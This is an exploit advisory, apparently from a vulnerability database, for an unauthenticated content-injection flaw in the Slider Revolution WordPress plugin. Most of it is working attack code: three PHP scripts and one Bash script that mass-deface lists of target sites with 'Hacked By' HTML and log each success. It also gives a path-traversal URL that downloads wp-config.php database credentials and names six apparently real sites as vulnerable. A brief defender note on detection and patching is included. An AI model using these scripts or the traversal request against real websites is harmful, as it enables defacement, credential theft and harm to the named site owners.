WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection

2019.03.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-74

############################################################################################ # Exploit Title : WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Published Date : 20/03/2019 # Vulnerability Discovered Date : 2013 - 2014 # Vendor Homepage : revolution.themepunch.com - codecanyon.net # Software Information Link : codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380 # Software Affected Versions : 4.x.x - 5.x.x with Software 4.6.5 and lower versions # Software Price Type : Paid Download - 26$ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos # Cyberizm Reference Link : cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html ############################################################################################ # Description about Software : *************************** Slider Revolution (Revolution Slider) is an innovative, responsive WordPress Slider Plugin that displays your content the beautiful way. Whether it’s a Slider, Carousel, Hero Image or Video Scene for best conversion rates or even a whole Front Page, the visual, drag & drop editor will let you tell your own stories in no time! Desktop or mobile device! Note : This exploit was used in the wild in 2014 - 2015, but it was never shared in detail; that is why I am making it public. 
############################################################################################ # Impact : *********** The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize, or incorrectly neutralizes, special elements that could modify how it is parsed or interpreted when it is sent to a downstream component; this is known as content injection. In this plugin the "update_captions_css" AJAX handler passes the request's "data" parameter straight to updateCaptionsContentData() without any visible authentication, capability or nonce check, so the stored captions CSS can be overwritten by an unauthenticated remote request and is then served back to any unauthenticated request via "get_captions_css". For defenders: unauthenticated POST requests to admin-ajax.php carrying client_action=update_captions_css should be treated as hostile and alerted on, and the plugin should be updated beyond the affected versions listed above so that this handler is restricted to authorized users. ############################################################################################ # Explanation for Vulnerability : ******************************** # Vulnerability : ************ /wp-content/plugins/revslider/revslider_admin.php /wp-admin/admin-ajax.php "action" => "revslider_ajax_action", "client_action" => "update_captions_css", # Vulnerability Message : ************************* {"success":false,"message":"Wrong request"} # Vulnerability Response for Successful Exploitation : ***************************************** {"success":true,"message":"","data":" # Directory File Destination : ************************ /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css # Vulnerable Source Code : ************************ 232. $action = self::getPostGetVar("client_action"); 233. $data = self::getPostGetVar("data"); ... 301. case "get_captions_css": 302. $contentCSS = $operations->getCaptionsContent(); 303. self::ajaxResponseData($contentCSS); ... 305. case "update_captions_css": 306. $arrCaptions = $operations->updateCaptionsContentData($data); 307. 
self::ajaxResponseSuccess("CSS file saved succesfully!",array("arrCaptions"=>$arrCaptions)) # Database Configuration File Download : ************************************ /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php Informations About MySQL Database Configuration File => **************************************************** ** The name of the database for WordPress */ define('DB_NAME', ''); /** MySQL database username */ define('DB_USER', ''); /** MySQL database password */ define('DB_PASSWORD', ''); /** MySQL hostname */ define('DB_HOST', ''); Note : Use Auto PHP and Bash Exploiter to use this Vulnerability. ############################################################################################ # Content Injection PHP Exploiter 1: ******************************** <b>..::|| Wordpress Revslider UpdateCaptionsCSS GetCaptionsCSS Content Injection Exploiter ||::..</b> <?php /* [#]Coded By : KingSkrupellos [#]www.cyberizm.org */ //====================================================== @error_reporting(0); @set_time_limit(0); //====================================================== echo'<form method="post"> <textarea name="s" cols="50" rows="13" ></textarea><br> <input type="submit" name="g" value="GO" /> </form>'; //======================================================= if(isset($_POST['g']) and !empty($_POST['s'])){ $urls = explode("\r\n",$_POST['s']); foreach($urls as $url){ $url = trim($url); $post = array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<h2>Hacked By KingSkrupellos Cyberizm Digital Security Army<br>:)<br>"); $site = $url."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"; $ch = curl_init(); curl_setopt($ch,CURLOPT_URL, $site); curl_setopt($ch,CURLOPT_RETURNTRANSFER, true); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$post); curl_setopt($ch,CURLOPT_TIMEOUT,30); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0); $cn = 
curl_exec($ch); $fcn = @file_get_contents($site); if(eregi('hacked',$fcn)){ echo "<b>[#] $url : done <a href=\"$site\">HERE</a></b><br>"; }else{ echo"[!]$url : failed<br>"; } } } //========================= \!/ Mission Accomplished \!/ ====================================================// ?> ############################################################################################ # Content Injection PHP Exploiter 2 : ********************************* <?php echo "\n+-------------------------------------------+\n"; echo "| Cyberizm Digital Security Army |\n"; echo "| www.cyberizm.org |\n"; echo "+-------------------------------------------+\n"; $gv=@file_get_contents($argv[1]); $exv=explode("\r\n",$gv); echo "\n\t Total site loaded : ".count($exv)."\n\n"; foreach($exv as $url){ echo "\n[+]Scaning : $url \n"; dr($url); } function dr($site){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php"); curl_setopt($ch, CURLOPT_USERAGENT, $agent); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); $result = curl_exec($ch); if (eregi('true', $result)) $path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"; $gett=@file_get_contents($path); if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){ echo "\n[+]Exploit Done \n[+]shell : $path \n\n "; $fo = fopen("finish.txt","a+"); $r = 
fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n"); fclose($fo); } else { echo "| ".$site . " : Not Revslider \n\n"; } curl_close($ch); } echo "\n[-]Exploit Fail \n\n"; } } ?> ############################################################################################ # Content Injection Bash Exploiter 3 : ********************************* #!/bin/bash #coded = IBT SS(){ curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \ -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \ -H "Accept-Language: en-us,en;q=0.5" \ -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \ -F "client_action=update_captions_css" \ -F "action=revslider_ajax_action" \ -F "data=x$(cat tmp/s.txt)" \ --request POST "http://${1}/wp-admin/admin-ajax.php" } CD(){ if [ -f tmp/cd.txt ];then rm -f tmp/cd.txt fi curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt if [ ! -f tmp/cd.txt ];then echo "--> $urlnya : not vuln" continue fi cat tmp/cd.txt | grep -i "KingSkrupellos" > /dev/null;cd=$? if [ $cd -eq 0 ];then echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success" echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt else echo "--> $urlnya : exploit failed" fi } CV(){ if [ -f tmp/cv.txt ];then rm -f tmp/cv.txt fi curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt if [ ! -f tmp/cv.txt ];then echo "--> $urlnya : not vuln" continue fi cat tmp/cv.txt | grep "wrong ajax action:" > /dev/null;cv=$? 
if [ $cv -eq 1 ];then echo "--> $urlnya : not vuln" continue else echo "--> $urlnya : found revslider" fi } Exp(){ for url in `cat $list` do urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1') if [ ! -f load.txt ];then touch load.txt fi cat load.txt | grep "$urlnya" > /dev/null;ccl=$? if [ $ccl -eq 1 ];then echo $urlnya >> load.txt else #udah pernah di load di file load.txt #kalau mau load ulang,silakan hapus file load.txt continue fi echo "--> $urlnya : check" CV $urlnya SS $urlnya CD $urlnya done } Lengkap(){ if [ ! -f $list ];then echo "[!] $list not exist" exit fi if [ ! -d tmp ];then mkdir tmp fi if [ ! -f tmp/s.txt ];then cat > tmp/s.txt <<_script <body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Army<p style='color: transparent'> _script fi Exp } read -p "[+] Enter list target = " list Lengkap ############################################################################################ # Content Injection PHP Exploiter 4 : ********************************* <?php $post = array ( "action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<marquee>Hacked By KingSkrupellos Cyberizm Digital Security Army</marquee>" ); $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_POST, 1); curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch); curl_close ($ch); ?> ############################################################################################ # Example Vulnerable Sites : 
************************* [+] filature-lille.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] daniperezrun.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] bilateralsolutions.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] blog.acquaesapone.it/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] new.med.com.do/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css [+] en.neural.co.jp/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css ############################################################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ############################################################################################

